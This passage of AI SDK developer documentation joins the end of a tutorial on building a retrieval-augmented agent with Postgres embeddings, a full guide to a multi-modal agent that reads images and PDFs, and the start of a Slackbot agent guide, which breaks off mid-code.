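<Snippet text={['pnpm install']} />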
Create Database
You will need a Postgres database to complete this tutorial. If you don't have Postgres set up on your local machine, you can:
- Create a free Postgres database with Vercel (recommended - see instructions below); or
- Follow this guide to set it up locally
Setting up Postgres with Vercel
To set up a Postgres instance on your Vercel account:
- Go to Vercel.com and make sure you're logged in
- Navigate to your team homepage
- Click on the Integrations tab
- Click Browse Marketplace
- Look for the Storage option in the sidebar
- Select the Neon option (recommended, but any other PostgreSQL database provider should work)
- Click Install, then click Install again in the top right corner
- On the "Get Started with Neon" page, click Create Database on the right
- Select your region (e.g., Washington, D.C., U.S. East)
- Turn off Auth
- Click Continue
- Name your database (you can use the default name or rename it to something like "RagTutorial")
- Click Create in the bottom right corner
- After seeing "Database created successfully", click Done
- You'll be redirected to your database instance
- In the Quick Start section, click Show secrets
- Copy the full DATABASE_URL environment variable
Migrate Database
Once you have a Postgres database, you need to add the connection string as an environment secret.
Make a copy of the .env.example file and rename it to .env.
Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.
With that set up, you can now run your first database migration. Run the following command:
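<Snippet text={['pnpm db:migrate']} />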
This will first add the pgvector extension to your database. Then it will create a new table for your resources schema that is defined in lib/db/schema/resources.ts. This schema has four columns: id, content, createdAt, and updatedAt.
Vercel AI Gateway Key
For this guide, you will need a Vercel AI Gateway API key, which gives you access to hundreds of models from different providers with one API key. If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.
Now, open your .env file and add your AI Gateway API key:
AI_GATEWAY_API_KEY=your-api-key
Replace your-api-key with your actual Vercel AI Gateway API key.
Build
Let’s build a quick task list of what needs to be done:
- Create a table in your database to store embeddings
- Add logic to chunk and create embeddings when creating resources
- Create an agent
- Give the agent tools to query / create resources for its knowledge base
Create Embeddings Table
Currently, your application has one table (resources) which has a column (content) for storing content. Remember, each resource (source material) will have to be chunked, embedded, and then stored. Let’s create a table called embeddings to store these chunks.
Create a new file (lib/db/schema/embeddings.ts) and add the following code:
import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';
export const embeddings = pgTable(
'embeddings',
{
id: varchar('id', { length: 191 })
.primaryKey()
.$defaultFn(() => nanoid()),
resourceId: varchar('resource_id', { length: 191 }).references(
() => resources.id,
{ onDelete: 'cascade' },
),
content: text('content').notNull(),
embedding: vector('embedding', { dimensions: 1536 }).notNull(),
},
table => ({
embeddingIndex: index('embeddingIndex').using(
'hnsw',
table.embedding.op('vector_cosine_ops'),
),
}),
);
This table has four columns:
- id - unique identifier
- resourceId - a foreign key relation to the full source material
- content - the plain text chunk
- embedding - the vector representation of the plain text chunk
To perform similarity search, you also need to include an index (HNSW or IVFFlat) on this column for better performance.
To push this change to the database, run the following command:
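<Snippet text={['pnpm db:push']} />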
Add Embedding Logic
Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.
Create a file with the following command:
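<Snippet text={['mkdir lib/ai && touch lib/ai/embedding.ts']} />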
Generate Chunks
Remember, to create an embedding, you will start with a piece of source material (unknown length), break it down into smaller chunks, embed each chunk, and then save the chunk to the database. Let’s start by creating a function to break the source material into small chunks.
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
This function will take an input string and split it by periods, filtering out any empty items. This will return an array of strings. It is worth experimenting with different chunking techniques in your projects as the best technique will vary.
Install AI SDK
You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:
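<Snippet text={['pnpm add ai @ai-sdk/react']} />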
This will install the AI SDK and the AI SDK's React hooks.
Generate Embeddings
Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.
import { embedMany } from 'ai';
const embeddingModel = 'openai/text-embedding-ada-002';
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.
Next, you create an asynchronous function called generateEmbeddings. This function will take in the source material (value) as an input and return a promise of an array of objects, each containing an embedding and content. Within the function, you first generate chunks for the input. Then, you pass those chunks to the embedMany function imported from the AI SDK which will return embeddings of the chunks you passed in. Finally, you map over and return the embeddings in a format that is ready to save in the database.
Update Server Action
Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
return 'Resource successfully created.';
} catch (e) {
if (e instanceof Error)
return e.message.length > 0 ? e.message : 'Error, please try again.';
}
};
This function is a Server Action, as denoted by the 'use server' directive at the top of the file. This means that it can be called anywhere in your Next.js application. This function will take an input, run it through a Zod schema to ensure it adheres to the correct schema, and then create a new resource in the database. This is the ideal location to generate and store embeddings of the newly created resources.
Update the file with the following code:
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
const embeddings = await generateEmbeddings(content);
await db.insert(embeddingsTable).values(
embeddings.map(embedding => ({
resourceId: resource.id,
...embedding,
})),
);
return 'Resource successfully created and embedded.';
} catch (error) {
return error instanceof Error && error.message.length > 0
? error.message
: 'Error, please try again.';
}
};
First, you call the generateEmbeddings function created in the previous step, passing in the source material (content). Once you have your embeddings (e) of the source material, you can save them to the database, passing the resourceId alongside each embedding.
Create Root Page
Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your agent.
Replace your root page (app/page.tsx) with the following code.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
{m.parts.map(part => {
switch (part.type) {
case 'text':
return <p>{part.text}</p>;
}
})}
</div>
</div>
))}
</div>
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
The useChat hook enables the streaming of chat messages from your AI provider (you will be using OpenAI via the Vercel AI Gateway), manages the state for chat input, and updates the UI automatically as new messages are received.
Run the following command to start the Next.js dev server:
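<Snippet text={['pnpm run dev']} />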
Head to http://localhost:3000. You should see an empty screen with an input bar floating at the bottom. Try to send a message. The message shows up in the UI for a fraction of a second and then disappears. This is because you haven’t set up the corresponding API route to call the model! By default, useChat will send a POST request to the /api/chat endpoint with the messages as the request body.
You can customize the endpoint in the useChat configuration object.
Create API Route
In Next.js, you can create custom request handlers for a given route using Route Handlers. Route Handlers are defined in a route.ts file and can export HTTP methods like GET, POST, PUT, PATCH etc.
Create a file at app/api/chat/route.ts by running the following command:
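<Snippet text={['mkdir -p app/api/chat && touch app/api/chat/route.ts']} />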
Open the file and add the following code:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
In this code, you declare and export an asynchronous function called POST. You retrieve the messages from the request body and then pass them to the streamText function imported from the AI SDK, alongside the model you would like to use. Finally, you return the model’s response in UIMessageStreamResponse format.
Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!
Refining your prompt
While you now have a working agent, it isn't doing anything special.
Let’s add system instructions to refine and restrict the model’s behavior. In this case, you want the model to only use information it has retrieved to generate responses. Update your route handler with the following code:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Head back to the browser and try to ask the model what your favorite food is. The model should now respond exactly as you instructed above (“Sorry, I don’t know”) given it doesn’t have any relevant information.
In its current form, your agent is now, well, useless. How do you give the model the ability to add and query information?
Using Tools
A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.
Let’s see how you can create a tool to give the model the ability to create, embed, and save a resource to your agent’s knowledge base.
Add Resource Tool
Update your route handler with the following code:
import { createResource } from '@/lib/actions/resources';
import { convertToModelMessages, streamText, tool, UIMessage } from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: convertToModelMessages(messages),
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
},
});
return result.toUIMessageStreamResponse();
}
In this code, you define a tool called addResource. This tool has three elements:
- description: description of the tool that will influence when the tool is picked.
- inputSchema: Zod schema that defines the input necessary for the tool to run.
- execute: An asynchronous function that is called with the arguments from the tool call.
In simple terms, on each generation, the model will decide whether it should call the tool. If it deems it should call the tool, it will extract the input and then append a new message to the messages array of type tool-call. The AI SDK will then run the execute function with the parameters provided by the tool-call message.
Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let’s see. Run the following command in a new terminal window.
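<Snippet text={['pnpm db:studio']} />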
This will start Drizzle Studio, where you can view the rows in your database. You should see a new row in both the embeddings and resources tables with your favorite food!
Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
{m.parts.map(part => {
switch (part.type) {
case 'text':
return <p>{part.text}</p>;
case 'tool-addResource':
case 'tool-getInformation':
return (
<p>
call{part.state === 'output-available' ? 'ed' : 'ing'}{' '}
tool: {part.type}
<pre className="my-4 bg-zinc-100 p-2 rounded-sm">
{JSON.stringify(part.input, null, 2)}
</pre>
</p>
);
}
})}
</div>
</div>
))}
</div>
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
With this change, you now conditionally render the tool that has been called directly in the UI. Save the file and head back to the browser. Tell the model your favorite movie. You should see which tool is called in place of the model’s typical text response.
Improving UX with Multi-Step Calls
It would be nice if the model could summarize the action too. However, technically, once the model calls a tool, it has completed its generation as it ‘generated’ a tool call. How could you achieve this desired behaviour?
The AI SDK has a feature called stopWhen which allows you to define stopping conditions for when the model generates a tool call. If those stopping conditions haven't been hit, the AI SDK will automatically send tool call results back to the model!
Open your route handler (app/api/chat/route.ts) and add the following key to the streamText configuration object:
import { createResource } from '@/lib/actions/resources';
import {
convertToModelMessages,
streamText,
tool,
UIMessage,
stepCountIs,
} from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: convertToModelMessages(messages),
stopWhen: stepCountIs(5),
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
},
});
return result.toUIMessageStreamResponse();
}
Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.
Retrieve Resource Tool
The model can now add and embed arbitrary information to your knowledge base. However, it still isn’t able to query it. Let’s create a new tool to allow the model to answer questions by finding relevant information in your knowledge base.
To find similar content, you will need to embed the user’s query, search the database for semantic similarities, and then pass those items to the model as context alongside the query. To achieve this, let’s update your embedding logic file (lib/ai/embedding.ts):
import { embed, embedMany } from 'ai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';
const embeddingModel = 'openai/text-embedding-ada-002';
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
export const generateEmbedding = async (value: string): Promise<number[]> => {
const input = value.replaceAll('\\n', ' ');
const { embedding } = await embed({
model: embeddingModel,
value: input,
});
return embedding;
};
export const findRelevantContent = async (userQuery: string) => {
const userQueryEmbedded = await generateEmbedding(userQuery);
const similarity = sql<number>`1 - (${cosineDistance(
embeddings.embedding,
userQueryEmbedded,
)})`;
const similarGuides = await db
.select({ name: embeddings.content, similarity })
.from(embeddings)
.where(gt(similarity, 0.5))
.orderBy(t => desc(t.similarity))
.limit(4);
return similarGuides;
};
In this code, you add two functions:
- generateEmbedding: generates a single embedding from an input string
- findRelevantContent: embeds the user’s query, searches the database for similar items, then returns relevant items
With that done, it’s onto the final step: creating the tool.
Go back to your route handler (api/chat/route.ts) and add a new tool called getInformation:
import { createResource } from '@/lib/actions/resources';
import {
convertToModelMessages,
streamText,
tool,
UIMessage,
stepCountIs,
} from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: convertToModelMessages(messages),
stopWhen: stepCountIs(5),
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
getInformation: tool({
description: `get information from your knowledge base to answer questions.`,
inputSchema: z.object({
question: z.string().describe('the users question'),
}),
execute: async ({ question }) => findRelevantContent(question),
}),
},
});
return result.toUIMessageStreamResponse();
}
Head back to the browser, refresh the page, and ask for your favorite food. You should see the model call the getInformation tool, and then use the relevant information to formulate a response!
Conclusion
Congratulations, you have successfully built an AI agent that can dynamically add and retrieve information to and from a knowledge base. Throughout this guide, you learned how to create and store embeddings, set up server actions to manage resources, and use tools to extend the capabilities of your agent.
Troubleshooting Migration Error
If you experience an error with the migration, open your migration file (lib/db/migrations/0000_yielding_bloodaxe.sql), cut (copy and remove) the first line, and run it directly on your postgres instance. You should now be able to run the updated migration.
If you're using the Vercel setup above, you can run the command directly by either:
- Going to the Neon console and entering the command there, or
- Going back to the Vercel platform, navigating to the Quick Start section of your database, and finding the PSQL connection command (second tab). This will connect to your instance in the terminal where you can run the command directly.
---
title: Multi-Modal Agent
description: Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK.
tags: ['multi-modal', 'agent', 'images', 'pdf', 'vision', 'next']
---
Multi-Modal Agent
In this guide, you will build a multi-modal agent capable of understanding both images and PDFs.
Multi-modal refers to the ability of the agent to understand and generate responses in multiple formats. In this guide, we'll focus on images and PDFs - two common document types that modern language models can process natively.
We'll build this agent using OpenAI's GPT-4o, but the same code works seamlessly with other providers - you can switch between them by changing just one line of code.
Prerequisites
To follow this quickstart, you'll need:
- Node.js 18+ and pnpm installed on your local development machine.
- A Vercel AI Gateway API key.
If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.
Create Your Application
Start by creating a new Next.js application. This command will create a new directory named multi-modal-agent and set up a basic Next.js application inside it.
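<Snippet text="pnpm create next-app@latest multi-modal-agent" dark />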
Navigate to the newly created directory:
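<Snippet text="cd multi-modal-agent" dark />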
Install dependencies
Install ai and @ai-sdk/react, the AI SDK package and the AI SDK's React package respectively.
<Snippet text="pnpm add ai @ai-sdk/react" dark />
Configure your Vercel AI Gateway API key
Create a .env.local file in your project root and add your Vercel AI Gateway API key. This key authenticates your application with Vercel AI Gateway.
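<Snippet text="touch .env.local" dark />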
Edit the .env.local file:
AI_GATEWAY_API_KEY=your_api_key_here
Replace your_api_key_here with your actual Vercel AI Gateway API key.
Implementation Plan
To build a multi-modal agent, you will need to:
- Create a Route Handler to handle incoming chat messages and generate responses.
- Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
- Add the ability to upload images and PDFs and attach them alongside the chat messages.
Create a Route Handler
Create a route handler, app/api/chat/route.ts and add the following code:
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Let's take a look at what is happening in this code:
- Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the agent and provides the agent with the necessary context to make the next generation.
- Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
- Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider and messages (converted in step 2). You can pass additional settings to further customise the model's behaviour.
- The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function which converts the result to a streamed response object.
- Finally, return the result to the client to stream the response.
This Route Handler creates a POST request endpoint at /api/chat.
Wire up the UI
Now that you have a Route Handler that can query a large language model (LLM), it's time to set up your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.
Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form
onSubmit={async event => {
event.preventDefault();
sendMessage({
role: 'user',
parts: [{ type: 'text', text: input }],
});
setInput('');
}}
className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.target.value)}
/>
</form>
</div>
);
}
This page utilizes the useChat hook, configured with DefaultChatTransport to specify the API endpoint. The useChat hook provides multiple utility functions and state variables:
- messages - the current chat messages (an array of objects with id, role, and parts properties).
- sendMessage - a function to send a new message to the AI.
- Each message contains a parts array that can include text, images, PDFs, and other content types.
- Files are converted to data URLs before being sent to maintain compatibility across different environments.
Add File Upload
To make your agent multi-modal, let's add the ability to upload and send both images and PDFs to the model. In v5, files are sent as part of the message's parts array. Files are converted to data URLs using the FileReader API before being sent to the server.
Update your root page (app/page.tsx) with the following code:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useRef, useState } from 'react';
import Image from 'next/image';
async function convertFilesToDataURLs(files: FileList) {
return Promise.all(
Array.from(files).map(
file =>
new Promise<{
type: 'file';
mediaType: string;
url: string;
}>((resolve, reject) => {
const reader = new FileReader();
reader.onload = () => {
resolve({
type: 'file',
mediaType: file.type,
url: reader.result as string,
});
};
reader.onerror = reject;
reader.readAsDataURL(file);
}),
),
);
}
export default function Chat() {
const [input, setInput] = useState('');
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
}
if (part.type === 'file' && part.mediaType?.startsWith('image/')) {
return (
<Image
key={`${m.id}-image-${index}`}
src={part.url}
width={500}
height={500}
alt={`attachment-${index}`}
/>
);
}
if (part.type === 'file' && part.mediaType === 'application/pdf') {
return (
<iframe
key={`${m.id}-pdf-${index}`}
src={part.url}
width={500}
height={600}
title={`pdf-${index}`}
/>
);
}
return null;
})}
</div>
))}
<form
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
onSubmit={async event => {
event.preventDefault();
const fileParts =
files && files.length > 0
? await convertFilesToDataURLs(files)
: [];
sendMessage({
role: 'user',
parts: [{ type: 'text', text: input }, ...fileParts],
});
setInput('');
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}}
>
<input
type="file"
accept="image/*,application/pdf"
className=""
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.target.value)}
/>
</form>
</div>
);
}
In this code, you:
- Add a helper function convertFilesToDataURLs to convert file uploads to data URLs.
- Create state to hold the input text, files, and a ref to the file input field.
- Configure useChat with DefaultChatTransport to specify the API endpoint.
- Display messages using the parts array structure, rendering text, images, and PDFs appropriately.
- Update the onSubmit function to send messages with the sendMessage function, including both text and file parts.
- Add a file input field to the form, including an onChange handler to handle updating the files state.
Running Your Application
With that, you have built everything you need for your multi-modal agent! To start your application, use the command:
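<Snippet text="pnpm run dev" dark />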
Head to your browser and open http://localhost:3000. You should see an input field and a button to upload files.
Try uploading an image or PDF and asking the model questions about it. Watch as the model's response is streamed back to you!
Using Other Providers
With the AI SDK's unified provider interface you can easily switch to other providers that support multi-modal capabilities:
// Using Anthropic
const result = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
messages: convertToModelMessages(messages),
});
// Using Google
const result = streamText({
model: 'google/gemini-2.5-flash',
messages: convertToModelMessages(messages),
});
Install the provider package (@ai-sdk/anthropic or @ai-sdk/google) and update your API keys in .env.local. The rest of your code remains the same.
Where to Next?
You've built a multi-modal AI agent using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling.
---
title: Slackbot Agent Guide
description: Learn how to use the AI SDK to build an AI Agent in Slack.
tags: ['agents', 'chatbot']
---
Building an AI Agent in Slack with the AI SDK
In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.
Slack App Setup
Before we start building, you'll need to create and configure a Slack app:
- Go to api.slack.com/apps
- Click "Create New App" and choose "From scratch"
- Give your app a name and select your workspace
- Under "OAuth & Permissions", add the following bot token scopes:
  - app_mentions:read
  - chat:write
  - im:history
  - im:write
  - assistant:write
- Install the app to your workspace (button under "OAuth Tokens" subsection)
- Copy the Bot User OAuth Token and Signing Secret for the next step
- Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"
Project Setup
This project uses the following stack:
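- AI SDK by Vercel
- Slack Web API (@slack/web-api)
- Exa (web search)
- Vercel Functions (waitUntil)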
Getting Started
- Clone the repository and check out the starter branch
<Snippet text={[ 'git clone https://github.com/vercel-labs/ai-sdk-slackbot.git', 'cd ai-sdk-slackbot', 'git checkout starter', ]} />
- Install dependencies
<Snippet text={['pnpm install']} />
Project Structure
The starter repository already includes:
- Slack utilities (lib/slack-utils.ts) including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
- General utility functions (lib/utils.ts) including initial Exa setup
- Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
- An API endpoint (POST) for Slack events (api/events.ts)
Event Handler
First, let's take a look at our API route (api/events.ts):
import type { SlackEvent } from '@slack/web-api';
import {
assistantThreadMessage,
handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';
export async function POST(request: Request) {
const rawBody = await request.text();
const payload = JSON.parse(rawBody);
const requestType = payload.type as 'url_verification' | 'event_callback';
// See https://api.slack.com/events/url_verification
if (requestType === 'url_verification') {
return new Response(payload.challenge, { status: 200 });
}
await verifyRequest({ requestType, request, rawBody });
try {
const botUserId = await getBotId();
const event = payload.event as SlackEvent;
if (event.type === 'app_mention') {
waitUntil(handleNewAppMention(event, botUserId));
}
if (event.type === 'assistant_thread_started') {
waitUntil(assistantThreadMessage(event));
}
if (
event.type === 'message' &&
!event.subtype &&
event.channel_type === 'im' &&
!event.bot_id &&
!event.bot_profile &&
event.bot_id !== botUserId
) {
waitUntil(handleNewAssistantMessage(event, botUserId));
}
return new Response('Success!', { status: 200 });
} catch (error) {
console.error('Error generating response', error);
return new Response('Error generating response', { status: 500 });
}
}
This file defines a POST function that handles incoming requests from Slack. First, you check the request type to see if it's a URL verification request. If it is, you respond with the challenge string provided by Slack. If it's an event callback, you verify the request and then have access to the event data. This is where you can implement your event handling logic.
You then handle three types of events: app_mention, assistant_thread_started, and message:
- For app_mention, you call handleNewAppMention with the event and the bot user ID.
- For assistant_thread_started, you call assistantThreadMessage with the event.
- For message, you call handleNewAssistantMessage with the event and the bot user ID.
Finally, you respond with a success message to Slack. Note, each handler function is wrapped in a waitUntil function. Let's take a look at what this means and why it's important.
The waitUntil Function
Slack expects a response within 3 seconds to confirm the request is being handled. However, generating AI responses can take longer. If you don't respond to the Slack request within 3 seconds, Slack will send another request, leading to another invocation of your API route, another call to the LLM, and ultimately another response to the user. To solve this, you can use the waitUntil function, which allows you to run your AI logic after the response is sent, without blocking the response itself.
This means, your API endpoint will:
- Immediately respond to Slack (within 3 seconds)
- Continue processing the message asynchronously
- Send the AI response when it's ready
Event Handlers
Let's look at how each event type is currently handled.
App Mentions
When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:
- Checks if the message is from a bot to avoid infinite response loops
- Creates a status updater to show the bot is "thinking"
- If the mention is in a thread, it retrieves the thread history
- Calls the LLM with the message content (using the generateResponse function, which you will implement in the next section)
- Updates the initial "thinking" message with the AI response
Here's the code for the handleNewAppMention function:
import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';
const updateStatusUtil = async (
initialStatus: string,
event: AppMentionEvent,
) => {
const initialMessage = await client.chat.postMessage({
channel: event.channel,
thread_ts: event.thread_ts ?? event.ts,
text: initialStatus,
});
if (!initialMessage || !initialMessage.ts)
throw new Error('Failed to post initial message');
const updateMessage = async (status: string) => {
await client.chat.update({
channel: event.channel,
ts: initialMessage.ts as string,
text: status,
});
};
return updateMessage;
};
export async function handleNewAppMention(
event: AppMentionEvent,
botUserId: string,
) {
console.log('Handling app mention');
if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
console.log('Skipping app mention');
return;
}
const { thread_ts, channel } = event;
const updateMessage = await updateStatusUtil('is thinking...', event);
if (thread_ts) {
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateMessage);
updateMessage(result);
} else {
const result = await generateResponse(
[{ role: 'user', content: event.text }],
updateMessage,
);
updateMessage(result);
}
}
Now let's see how new assistant threads and messages are handled.
Assistant Thread Messages
When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:
- Posts a welcome message to the thread
- Sets up suggested prompts to help users get started
Here's the code for the assistantThreadMessage function:
import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';
export async function assistantThreadMessage(
event: AssistantThreadStartedEvent,
) {
const { channel_id, thread_ts } = event.assistant_thread;
console.log(`Thread started: ${channel_id} ${thread_ts}`);
console.log(JSON.stringify(event));
await client.chat.postMessage({
channel: channel_id,
